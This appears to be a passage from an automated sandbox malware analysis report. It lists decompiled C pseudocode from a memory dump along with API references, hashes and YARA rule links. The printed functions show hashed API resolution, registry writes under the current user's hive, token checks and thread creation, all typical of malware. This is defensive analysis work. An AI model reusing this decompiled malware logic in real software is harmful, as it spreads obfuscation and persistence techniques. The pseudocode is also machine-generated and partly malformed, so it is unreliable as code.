					_t7 = GetFileAttributesW(_t18); // executed
					_t29 = _t7 - 0xffffffff;
					if(_t7 == 0xffffffff) {
						break;
					}
					_t10 = E0035BF50(_t29, 0, 0xad64007);
					 *_t10(_t18);
					_t12 = E0035BF50(_t29, 0, 0x7a2bc0);
					 *_t12(0xbb8);
					_t17 = _t17 + 1;
					_t14 = E00359D50(0x647400a6);
					_t20 = _t23 + 0x14;
					if(_t17 != _t14) {
						continue;
					}
					break;
				}
				E0035B570(_t18);
				return 0;
			}

0x00365426
0x00365429
0x00365430
0x00365437
0x00365452
0x00365454
0x00365459
0x0036545e
0x00365461
0x00365463
0x0036546c
0x00365471
0x00365475
0x00365475
0x0036547e
0x00365483
0x00365487
0x00365489
0x0036548c
0x00000000
0x00000000
0x00365495
0x0036549e
0x003654a7
0x003654b4
0x003654b6
0x003654bc
0x003654c1
0x003654c6
0x00000000
0x00000000
0x00000000
0x003654c6
0x003654cd
0x003654db

APIs

CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 00365452
GetFileAttributesW.KERNEL32(?), ref: 00365487

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: b29634974f5535e084c260cac04e5986a6ad44fcac0d1bab1d1f5c870d511141
Instruction ID: 9958c05f8d1c46ea2f7982743536d6cc604a626d81ac5a9f59dd97e2771b5672
Opcode Fuzzy Hash: b29634974f5535e084c260cac04e5986a6ad44fcac0d1bab1d1f5c870d511141
Instruction Fuzzy Hash: 690171A6BC430436E16232B47C43F7E61188BA2F5BF154130FE5CB91D6FA857A1904B7

Uniqueness

Uniqueness Score: -1.00%

Function 00363D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00363D80(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _t12;
				signed char _t13;
				void* _t14;
				long _t17;
				void* _t18;
				signed int _t21;
				intOrPtr* _t22;
				char* _t28;
				signed int _t29;

				_t44 = __eflags;
				_t13 = E00365000(_t12, __eflags, 0xffffffff);
				_t14 = E00359D50(0x647400a5);
				E0035BF50(_t44, _t14, E00359D50(0x63c03c4b));
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t13 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
				if(_t17 == 0) {
					_t28 = _a20;
					_t18 = E00359D50(0x647400a5);
					E0035BF50(__eflags, _t18, E00359D50(0x69a6701b));
					_t21 = RegSetValueExW(_a4, _a12, 0, _a16, _t28, _a24); // executed
					__eflags = _t21;
					_t10 = _t21 == 0;
					__eflags = _t10;
					_t29 = _t28 & 0xffffff00 | _t10;
					_t22 = E0035BF50(_t10, 9, 0x3111c69);
					 *_t22(_a4);
				} else {
					_t29 = 0;
				}
				return _t29;
			}

0x00363d80
0x00363d8b
0x00363da1
0x00363dba
0x00363dd5
0x00363dd9
0x00363ddf
0x00363dea
0x00363e03
0x00363e18
0x00363e1a
0x00363e1c
0x00363e1c
0x00363e1c
0x00363e26
0x00363e31
0x00363ddb
0x00363ddb
0x00363ddb
0x00363e39

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000002,?,00000000), ref: 00363DD5
RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00363E18

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: CreateValue
String ID:
API String ID: 2259555733-0
Opcode ID: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction ID: 52560d31e05d49bfcd6d422014a56b64f139d161e4d9515670a89a40a27b814e
Opcode Fuzzy Hash: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction Fuzzy Hash: 3C11ECB69002447FFB126AA0EC43F6F365CDB50756F154130FE18591A2E751EE2987F2

Uniqueness

Uniqueness Score: -1.00%

Function 0035AD80, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0035AD80(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _v16;
				long _v20;
				void* _t10;
				intOrPtr* _t12;
				void* _t13;
				void* _t15;
				int _t19;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t10 = E00359D50(0x647400a5);
				_t12 = E0035BF50(_t33, _t10, E00359D50(0x6b5f7e12));
				_t30 = _t27 + 0x10;
				_t13 =  *_t12(_a4, 8,  &_v16);
				_t34 = _t13;
				if(_t13 == 0) {
					_t26 = 0;
					__eflags = 0;
					L7:
					return _t26;
				}
				_t24 = _a8;
				_t15 = E0036B530(_t13, _t34, _v16); // executed
				_t31 = _t30 + 4;
				_t26 = _t15;
				if(_t24 != 0) {
					_t36 = _t26;
					if(_t26 != 0) {
						E0035BF50(_t36, 9, 0xbd557e);
						_t31 = _t31 + 8;
						_t19 = GetTokenInformation(_v16, 0xc, _t24, 4,  &_v20); // executed
						if(_t19 == 0) {
							E0035B570(_t26);
							_t31 = _t31 + 4;
							_t26 = 0;
						}
					}
				}
				E0035BF50(0, 0, 0xb8e7db5);
				FindCloseChangeNotification(_v16); // executed
				goto L7;
			}

0x0035ad80
0x0035ad8b
0x0035ad92
0x0035ad9e
0x0035adb7
0x0035adbc
0x0035adc6
0x0035adc8
0x0035adca
0x0035ae26
0x0035ae26
0x0035ae28
0x0035ae30
0x0035ae30
0x0035adcc
0x0035add2
0x0035add7
0x0035adda
0x0035adde
0x0035ade0
0x0035ade2
0x0035adeb
0x0035adf0
0x0035adff
0x0035ae03
0x0035ae06
0x0035ae0b
0x0035ae0e
0x0035ae0e
0x0035ae03
0x0035ade2
0x0035ae17
0x0035ae22
0x00000000

APIs

Part of subcall function 0036B530: GetTokenInformation.KERNELBASE(0035ADD7,00000001,00000000,00000000,?,0035ADD7,00000000), ref: 0036B55A
Part of subcall function 0036B530: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 0036B5B5

GetTokenInformation.KERNELBASE(00000000,0000000C,00000000,00000004,?), ref: 0035ADFF

Part of subcall function 0035B570: RtlFreeHeap.NTDLL(00000000,003686DD,003686DD,00000000), ref: 0035B593

FindCloseChangeNotification.KERNEL32(00000000), ref: 0035AE22

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: InformationToken$ChangeCloseFindFreeHeapNotification
String ID:
API String ID: 2311446219-0
Opcode ID: fbe3df51f540e3c06650b56492d512ab825fe1c60a1fd6bdc86e6e0620481923
Instruction ID: 12c2de79a932c9afdf989b50e541a771a2f46e8267cd6f6c46795ab77beaae66
Opcode Fuzzy Hash: fbe3df51f540e3c06650b56492d512ab825fe1c60a1fd6bdc86e6e0620481923
Instruction Fuzzy Hash: ED112C72D0051477D71366A0EC03F6FB6289F51706F054134FD186A261F771AA2C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 0036B530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0036B530(void* __eax, void* __eflags, void* _a4) {
				long _v20;
				int _t11;
				signed char _t16;
				void* _t17;
				int _t19;
				DWORD* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;

				_v20 = 0;
				E0035BF50(__eflags, 9, 0xbd557e);
				_t25 = _t24 + 8;
				_t21 =  &_v20;
				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t21); // executed
				_t23 = 0;
				_t30 = _t11;
				if(_t11 == 0) {
					_t16 = E003555C0( *((intOrPtr*)(E0035BF50(_t30, 0, E00359D50(0x68042b4e))))(), 0x7a);
					_t25 = _t25 + 0x14;
					if((_t16 & 0x00000001) != 0) {
						_t17 = E00358290(_v20);
						_t25 = _t25 + 4;
						_t32 = _t17;
						if(_t17 != 0) {
							_t22 = _t17;
							E0035BF50(_t32, 9, 0xbd557e);
							_t25 = _t25 + 8;
							_t19 = GetTokenInformation(_a4, 1, _t22, _v20, _t21); // executed
							_t23 = _t22;
							if(_t19 == 0) {
								E0035B570(_t22);
								_t25 = _t25 + 4;
								_t23 = 0;
							}
						}
					}
				}
				return _t23;
			}

0x0036b537
0x0036b545
0x0036b54a
0x0036b54d
0x0036b55a
0x0036b55c
0x0036b55e
0x0036b560
0x0036b57f
0x0036b584
0x0036b589
0x0036b58e
0x0036b593
0x0036b596
0x0036b598
0x0036b59a
0x0036b5a3
0x0036b5a8
0x0036b5b5
0x0036b5b9
0x0036b5bb
0x0036b5be
0x0036b5c3
0x0036b5c6
0x0036b5c6
0x0036b5bb
0x0036b598
0x0036b589
0x0036b5d1

APIs

GetTokenInformation.KERNELBASE(0035ADD7,00000001,00000000,00000000,?,0035ADD7,00000000), ref: 0036B55A

Part of subcall function 00358290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 003582E8

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 0036B5B5

Part of subcall function 0035B570: RtlFreeHeap.NTDLL(00000000,003686DD,003686DD,00000000), ref: 0035B593

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: HeapInformationToken$AllocateFreeLibraryLoad
String ID:
API String ID: 4190244075-0
Opcode ID: b41926fa670430cf111df0fd48833217f10bc732fe6064a37bfc692463faef04
Instruction ID: cf3869054c5716d6aab8a9898ae2869149ca2185b616daa982bfe25479740b51
Opcode Fuzzy Hash: b41926fa670430cf111df0fd48833217f10bc732fe6064a37bfc692463faef04
Instruction Fuzzy Hash: 21019B71E8021836EA2265B4AC43F7FB95D9F5275AF050434FD0CE91E2F751AA1C85A3

Uniqueness

Uniqueness Score: -1.00%

Function 0035E030, Relevance: 3.1, APIs: 2, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0035E030(void* __eflags, void* _a4, short* _a8, short* _a12) {
				void* _t9;
				long _t12;
				signed int _t14;
				intOrPtr* _t15;
				int _t20;
				signed int _t21;

				_t31 = __eflags;
				_t20 = (E00365000(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
				E0035BF50(_t31, 9, 0xda29a27);
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t20,  &_a4); // executed
				if(_t12 == 0) {
					E0035BF50(__eflags, 9, 0x8097c7);
					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
					__eflags = _t14;
					_t7 = _t14 == 0;
					__eflags = _t7;
					_t21 = _t20 & 0xffffff00 | _t7;
					_t15 = E0035BF50(_t7, 9, 0x3111c69);
					 *_t15(_a4);
				} else {
					_t21 = 0;
				}
				return _t21;
			}

0x0035e030
0x0035e04c
0x0035e056
0x0035e067
0x0035e06b
0x0035e07b
0x0035e08f
0x0035e091
0x0035e093
0x0035e093
0x0035e093
0x0035e09d
0x0035e0a8
0x0035e06d
0x0035e06d
0x0035e06d
0x0035e0b0

APIs

RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 0035E067
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 0035E08F

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction ID: ca7864ab3480e351a57cef74430126b3e87b770a6bdd35ec36084378297de85e
Opcode Fuzzy Hash: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction Fuzzy Hash: 2101F976A803183EEB0159A5DC43F9A3608DB80B66F140130FE1CAA1D2EAD1FA1986F1

Uniqueness

Uniqueness Score: -1.00%

Function 00353F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00353F90(void* _a4, intOrPtr _a8) {
				intOrPtr _t4;
				long _t8;
				void* _t10;
				void* _t14;
				void* _t15;
				long _t17;

				_t4 = _a8;
				_t25 = _t4;
				if(_t4 == 0) {
					return 0;
				}
				_t8 = E003522E0(_t25, E00351460(_t25, _t4, 0x8f5419a3) + 4, 0x8f5419a3);
				_t26 = _a4;
				_t17 = _t8;
				if(_a4 == 0) {
					E0035BF50(__eflags, 0, 0x8685de3);
					_t10 = RtlAllocateHeap( *0x372124, 8, _t17); // executed
					return _t10;
				}
				E0035BF50(_t26, 0, E00359D50(0x6caeab8f));
				_t15 =  *0x372124; // 0x8c0000
				_t14 = RtlReAllocateHeap(_t15, E00359D50(0x647400a4), _a4, _t17); // executed
				return _t14;
			}

0x00353f96
0x00353f99
0x00353f9b
0x00000000
0x00353ffb
0x00353fb4
0x00353fbc
0x00353fc0
0x00353fc2
0x00354006
0x00354017
0x00000000
0x00354017
0x00353fd4
0x00353fdc
0x00353ff7
0x00000000

APIs

RtlReAllocateHeap.NTDLL(008C0000,00000000,00000000,00000000), ref: 00353FF7
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00354017

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f5009ac49b53f4c455d93fbd37ec91bc8c65cb4c2df12a71a8f37876b0251023
Instruction ID: cafc285c9780cefac212b86d9fa1bd0de9ab98696e4723028d776686b9be34e2
Opcode Fuzzy Hash: f5009ac49b53f4c455d93fbd37ec91bc8c65cb4c2df12a71a8f37876b0251023
Instruction Fuzzy Hash: 100186A69041047BE6132661FC03F6B369CAB5539FF150430FD0DA6262E9219A1C87B2

Uniqueness

Uniqueness Score: -1.00%

Function 00369C40, Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00369C40(void* __eflags, void** _a4) {
				int _t6;
				int _t8;
				void** _t10;
				void* _t11;
				void* _t12;

				_t10 = _a4;
				_t6 = E00354A90( *_t10, 0);
				_t12 = _t11 + 8;
				_t15 = _t6 & 0x00000001;
				if((_t6 & 0x00000001) == 0) {
					E0035BF50(_t15, 0, 0xb1fd105);
					_t12 = _t12 + 8;
					_t6 = VirtualFree( *_t10, 0, 0x8000); // executed
				}
				_t16 = _t10[2];
				if(_t10[2] != 0) {
					E0035BF50(_t16, 0, 0xb8e7db5);
					_t8 = FindCloseChangeNotification(_t10[2]); // executed
					return _t8;
				}
				return _t6;
			}

0x00369c44
0x00369c4b
0x00369c50
0x00369c53
0x00369c55
0x00369c5e
0x00369c63
0x00369c6f
0x00369c6f
0x00369c71
0x00369c75
0x00369c7e
0x00369c89
0x00000000
0x00369c89
0x00369c8d

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 00369C6F
FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00369C89

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: ChangeCloseFindFreeNotificationVirtual
String ID:
API String ID: 560371109-0
Opcode ID: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction ID: 22f1719268452f7845452e7b134a35f05e85957b1c8be9e43bd9e49d6bbcc450
Opcode Fuzzy Hash: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction Fuzzy Hash: 74E0D835684304B6EA2236A0EC07F5476985F10747F118424FE8D791F9E6A2795486A5

Uniqueness

Uniqueness Score: -1.00%

Function 00364680, Relevance: 2.2, APIs: 1, Instructions: 710
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00364680(void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v52;
				char _v64;
				intOrPtr _v72;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				char _v208;
				char _v220;
				char _v232;
				char _v248;
				char _v266;
				char _v306;
				char _v528;
				char _v1048;
				void* _t171;
				void* _t173;
				void* _t175;
				intOrPtr* _t177;
				void* _t178;
				intOrPtr _t179;
				signed int _t229;
				signed int _t233;
				void* _t236;
				void* _t238;
				void* _t244;
				void* _t252;
				signed int _t254;
				void* _t263;
				void* _t269;
				void* _t276;
				intOrPtr _t279;
				signed int _t287;
				void* _t288;
				void* _t290;
				void* _t293;
				signed char _t299;
				void* _t314;
				signed int _t319;
				void* _t321;
				signed int _t323;
				signed int _t325;
				WCHAR* _t327;
				signed int _t329;
				void* _t339;
				signed int _t341;
				void* _t342;
				void* _t343;
				signed int _t350;
				signed int _t353;
				intOrPtr _t368;
				intOrPtr _t404;
				signed int _t487;
				intOrPtr _t488;
				signed int _t489;
				intOrPtr _t490;
				signed int _t499;
				intOrPtr _t512;
				signed int _t513;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t593;
				void* _t604;
				void* _t606;
				void* _t609;

				_t171 = E00367EE0(__eflags, 0xa20123ac, 1, 0xffffffff); // executed
				_t531 = _t530 + 0xc;
				_t611 = _t171;
				if(_t171 == 0) {
					L2:
					_t350 = 0;
				} else {
					_t173 = E00369AC0(_t611, 0xffffffff); // executed
					_t473 =  ==  ? 0x8026 : 0x801a;
					_t175 = E00359D50(0x647400a4);
					_t177 = E0035BF50(_t173 - 4, _t175, E00359D50(0x644e562b));
					_t535 = _t531 + 0x14;
					_t351 =  &_v1048;
					_t178 =  *_t177(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v1048); // executed
					if(_t178 == 0) {
						_t179 = E00358290(0x3d0);
						_t510 = _t179;
						E00361E90(__eflags, _t179 + 0xc); // executed
						_t2 = _t510 + 0x1c; // 0x1c, executed
						E00363BC0(_t2, __eflags);
						_t3 = _t510 + 0xe6; // 0xe6
						E00355CD0(__eflags, 2, _t3, 4, 8);
						_t4 = _t510 + 0xf8; // 0xf8
						E0035A980(_t4); // executed
						E0036F740( &_v64);
						__eflags = _a8;
						_t375 =  !=  ? 0x370bf2 : 0x37051c;
						E00365180( &_v1048,  &_v64, E00357200( !=  ? 0x370bf2 : 0x37051c,  &_v528), 0); // executed
						E0036F740( &_v232);
						E00365180( &_v1048,  &_v232, 0, 0); // executed
						E0036F740( &_v220);
						E00365180( &_v1048,  &_v220, 0, 0); // executed
						E0036F740( &_v208);
						E00365180( &_v1048,  &_v208, 0, 0); // executed
						E0036F740( &_v196);
						E00365180(_t351,  &_v196, 0, 0); // executed
						E0036F740( &_v184);
						E00365180(_t351,  &_v184, 0, 1); // executed
						E0036F740( &_v172);
						E00365180(_t351,  &_v172, 0, 1); // executed
						E0036F740( &_v160);
						E00365180(_t351,  &_v160, 0, 0); // executed
						E0036F740( &_v148);
						E00365180(_t351,  &_v148, 0, 0); // executed
						E0036F740( &_v136);
						E00365180(_t351,  &_v136, 0, 0); // executed
						E0036F740( &_v124);
						E00365180(_t351,  &_v124, 0, 0); // executed
						E0036F740( &_v112);
						E00365180(_t351,  &_v112, 0, 0); // executed
						E0036F740( &_v100);
						E00365180(_t351,  &_v100, 0, 0); // executed
						_t487 =  &_v88;
						E0036F740(_t487);
						_t470 = _t487;
						E00365180(_t351, _t487, 0, 0); // executed
						E003521E0(2, 0x80000001, E00357200(0x3709d0,  &_v306),  &_v266, 4, 8); // executed
						_t404 = _t179;
						_t23 = _t404 + 0x3be; // 0x3be
						_t488 = _t404;
						_v24 = _t404;
						E0035D4F0(_t487, 0, _t23, 4, 8);
						_t25 = _t488 + 0x3c7; // 0x3c7
						E0035D4F0(_t487, 0, _t25, 4, 8);
						_t489 = E003522E0(__eflags, E0035BA30(__eflags, _t351), 0xffffffff);
						_t229 = E0035EC30(E0036FCF0( &_v64) + _t489 * 2, 0xffffffff, _t179 + 0x1fe, 0x20);
						_t512 = _v24;
						__eflags = _t229;
						_t353 = 0 | _t229 == 0x00000000;
						_v20 = _t512 + 0x25e;
						_t233 = E0035EC30(E0036FCF0( &_v232) + _t489 * 2, 0xffffffff, _v20, 0x20);
						_t38 = _t353 + 1; // 0x1
						__eflags = _t233;
						_t513 = _t512 + 0x27e;
						_t408 =  !=  ? _t353 : _t38;
						_v20 =  !=  ? _t353 : _t38;
						_t236 = E0035EC30(E0036FCF0( &_v220) + _t489 * 2, 0xffffffff, _t513, 0x20);
						_t490 = _v24;
						__eflags = _t236 - 1;
						asm("sbb esi, esi");
						_v28 = _t490 + 0x29e;
						_t238 = E0036FCF0( &_v208);
						_v32 = _t489;
						__eflags = E0035EC30(_t238 + _t489 * 2, 0xffffffff, _v28, 0x20) - 1;
						asm("sbb esi, [ebp-0x10]");
						_v28 =  ~_t513;
						_v20 = _t490 + 0x2be;
						_t244 = E0036FCF0( &_v196);
						__eflags = E0035EC30(_t244 + _t489 * 2, 0xffffffff, _v20, E00359D50(0x6474008c));
						_t356 = 0 | __eflags == 0x00000000;
						_v20 = E00351460(__eflags, _t513,  ~(__eflags == 0));
						E00351460(__eflags, _v28, _t356);
						_t252 = E0036FCF0( &_v184);
						_t254 = E0035EC30(_t252 + _v32 * 2, 0xffffffff, _v24 + 0x21e, E00359D50(0x6474008c));
						__eflags = _t254;
						_v28 = E00359D50(0x59d06af4);
						_v36 = _v24 + 0x23e;
						_v36 = E0035EC30(E0036FCF0( &_v172) + _v32 * 2, 0xffffffff, _v36, 0x20);
						_v40 = E00359D50(0xe4894f31);
						_t263 = E0035EC30(E0036FCF0( &_v160) + _v32 * 2, 0xffffffff, _v24 + 0x2de, 0x20);
						__eflags = _v36 - 1;
						asm("adc ebx, 0x0");
						__eflags = _t263 - 1;
						asm("adc ebx, 0x0");
						__eflags = E0035EC30(E0036FCF0( &_v148) + _v32 * 2, 0xffffffff, _v24 + 0x2fe, 0x20);
						_t419 = 0 | __eflags == 0x00000000;
						_v20 = (_t254 == 0) - _v28 + _v20 + _v40 - 0x4358e545;
						_t269 = E00351460(__eflags, (_t254 == 0) - _v28 + _v20 + _v40 + 0xddcba449, __eflags == 0);
						E00351460(__eflags, _v20, _t419);
						_v20 = _v24 + 0x31e;
						__eflags = E0035EC30(E0036FCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20);
						_v20 = E00351460(E0035EC30(E0036FCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20), _t269 + 0xdedb7672, 0 | E0035EC30(E0036FCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20) == 0x00000000);
						_t276 = E0036FCF0( &_v124);
						__eflags = E0035EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00359D50(0x6474008c));
						_t279 = E00351460(E0035EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00359D50(0x6474008c)), _v20, 0 | E0035EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00359D50(0x6474008c)) == 0x00000000);
						_v20 = _v24 + 0x35e;
						__eflags = E0035EC30(E0036FCF0( &_v112) + _v32 * 2, 0xffffffff, _v20, 0x20) - 1;
						asm("adc esi, 0x0");
						_v20 = _t279;
						_t287 = E003555C0(E0035EC30(E0036FCF0( &_v100) + _v32 * 2, 0xffffffff, _v24 + 0x37e, 0x10), 0);
						_t288 = E00359D50(0x1eac204e);
						_t290 = E00351460(__eflags, _v20 - _t288 + (_t287 & 0x00000001), E00359D50(0x1eac204e));
						E00351460(__eflags, _v20, _t287 & 0x00000001);
						_t368 = _v24;
						_v20 = _t368 + 0x38e;
						_t293 = E0036FCF0( &_v88);
						__eflags = E0035EC30(_t293 + _v32 * 2, 0xffffffff, _v20, E00359D50(0x647400bc)) - 1;
						asm("adc esi, 0x0");
						__eflags = E0035EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1;
						asm("adc esi, 0x0");
						_t299 = E00356BB0(E0035EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1, _t290, 0);
						_t593 = _t535 + 0x240;
						__eflags = _t299 & 0x00000001;
						if((_t299 & 0x00000001) != 0) {
							L14:
							_t350 = 0;
							__eflags = 0;
						} else {
							_t314 = E00359D50(0x647410ac);
							_t499 = E0035D620(_t314, E00359D50(0x6474ff53));
							_t319 = E003520A0(__eflags, _t499,  !(E00359D50(0x6474ff53)));
							E00359D50(0x6474ff53);
							_t321 = E00359D50(0x647410ac);
							_t323 = E0035D620(_t321, E00359D50(0x6474ff53));
							 *(_t368 + 0x1fa) = _t323 << E00359D50(0x647400bc) | _t319 & _t499;
							_t325 = E0035D030(_t324, __eflags, _t368); // executed
							_t604 = _t593 + 0x38;
							__eflags = _t325;
							if(_t325 == 0) {
								goto L14;
							} else {
								_t529 = _a4;
								E0036EDD0( &_v52);
								_t327 = E0036FCF0(_a4);
								_t329 = E0035A5E0(_t327,  &_v76, E00359D50(0x647400ae)); // executed
								_t606 = _t604 + 0x10;
								__eflags = _t329;
								if(_t329 != 0) {
									_t470 = _v72 + _v76;
									__eflags = _v72 + _v76;
									E0036F410(_v76,  &_v52, _v76, _v72 + _v76); // executed
									E00369C40(__eflags,  &_v76); // executed
									_t606 = _t606 + 4;
								}
								_t447 =  &_v52;
								__eflags = E0036F190( &_v52);
								if(__eflags != 0) {
									_t339 = E0036F190( &_v52);
									_t341 = E0036CB00(__eflags,  &_v248, E0036EE10( &_v52), _t339); // executed
									_t609 = _t606 + 0xc;
									__eflags = _t341;
									if(__eflags != 0) {
										E0035ECC0(_t341,  &_v248, _t470, __eflags); // executed
									}
									_t342 = E0036F190( &_v52);
									_t343 = E0036EE10( &_v52);
									_t447 =  &_v64;
									E00369600(E0036FCF0( &_v64), __eflags, _t344, _t343, _t342); // executed
									_t606 = _t609 + 0xc; // executed
								}
								E003604C0(_t447, _t470, __eflags); // executed
								E00365040(_t447, _t470, __eflags); // executed
								__eflags = E00366700(__eflags);
								if(__eflags != 0) {
									E0035BF50(__eflags, 0, 0xa0733d4);
									CreateThread(0, 0, E00365420, E00367640(E0036FCF0(_t529), 0xffffffff), 0, 0); // executed
								}
								E0036FB40( &_v52); // executed
								_t350 = 1;
							}
						}
						E0036FB20( &_v88);
						E0036FB20( &_v100);
						E0036FB20( &_v112);
						E0036FB20( &_v124);
						E0036FB20( &_v136);
						E0036FB20( &_v148);
						E0036FB20( &_v160);
						E0036FB20( &_v172);
						E0036FB20( &_v184);
						E0036FB20( &_v196);
						E0036FB20( &_v208);
						E0036FB20( &_v220);
						E0036FB20( &_v232);
						E0036FB20( &_v64);
					} else {
						goto L2;
					}
				}
				return _t350;
			}

0x00364695
0x0036469a
0x0036469d
0x0036469f
0x003646f4
0x003646f4
0x003646a1
0x003646a3
0x003646b7
0x003646bf
0x003646d8
0x003646dd
0x003646e0
0x003646ee
0x003646f2
0x00364700
0x00364708
0x0036470e
0x00364716
0x00364719
0x0036471e
0x0036472b
0x00364733
0x0036473a
0x00364747
0x0036474c
0x0036475a
0x00364774
0x00364784
0x00364791
0x003647a1
0x003647ae
0x003647be
0x003647cb
0x003647db
0x003647e8
0x003647f8
0x00364805
0x00364815
0x00364822
0x00364832
0x0036483f
0x0036484f
0x0036485c
0x0036486c
0x00364879
0x00364886
0x00364893
0x003648a0
0x003648ad
0x003648ba
0x003648c7
0x003648cf
0x003648d4
0x003648db
0x003648e1
0x00364910
0x00364918
0x00364920
0x00364926
0x00364928
0x00364932
0x0036493a
0x00364947
0x00364966
0x00364976
0x0036497e
0x00364983
0x0036498b
0x00364994
0x003649a7
0x003649af
0x003649b2
0x003649b4
0x003649ba
0x003649bd
0x003649d6
0x003649de
0x003649e1
0x003649ea
0x003649f2
0x003649f5
0x003649fd
0x00364a10
0x00364a19
0x00364a20
0x00364a29
0x00364a2c
0x00364a52
0x00364a54
0x00364a65
0x00364a6c
0x00364a83
0x00364aa0
0x00364aaa
0x00364abf
0x00364ace
0x00364ae9
0x00364aff
0x00364b19
0x00364b32
0x00364b36
0x00364b39
0x00364b3f
0x00364b60
0x00364b68
0x00364b71
0x00364b78
0x00364b8c
0x00364ba3
0x00364bc3
0x00364bd5
0x00364bde
0x00364c02
0x00364c0b
0x00364c21
0x00364c3c
0x00364c42
0x00364c45
0x00364c67
0x00364c79
0x00364c99
0x00364ca5
0x00364cad
0x00364cb9
0x00364cbc
0x00364ce3
0x00364cec
0x00364d03
0x00364d06
0x00364d0c
0x00364d11
0x00364d14
0x00364d16
0x00364ec7
0x00364ec7
0x00364ec7
0x00364d1c
0x00364d21
0x00364d42
0x00364d55
0x00364d66
0x00364d73
0x00364d8c
0x00364da9
0x00364db0
0x00364db5
0x00364db8
0x00364dba
0x00000000
0x00364dc0
0x00364dc0
0x00364dc6
0x00364dcd
0x00364de7
0x00364dec
0x00364def
0x00364df1
0x00364dfc
0x00364dfc
0x00364e00
0x00364e06
0x00364e0b
0x00364e0b
0x00364e0e
0x00364e16
0x00364e18
0x00364e1f
0x00364e36
0x00364e3b
0x00364e3e
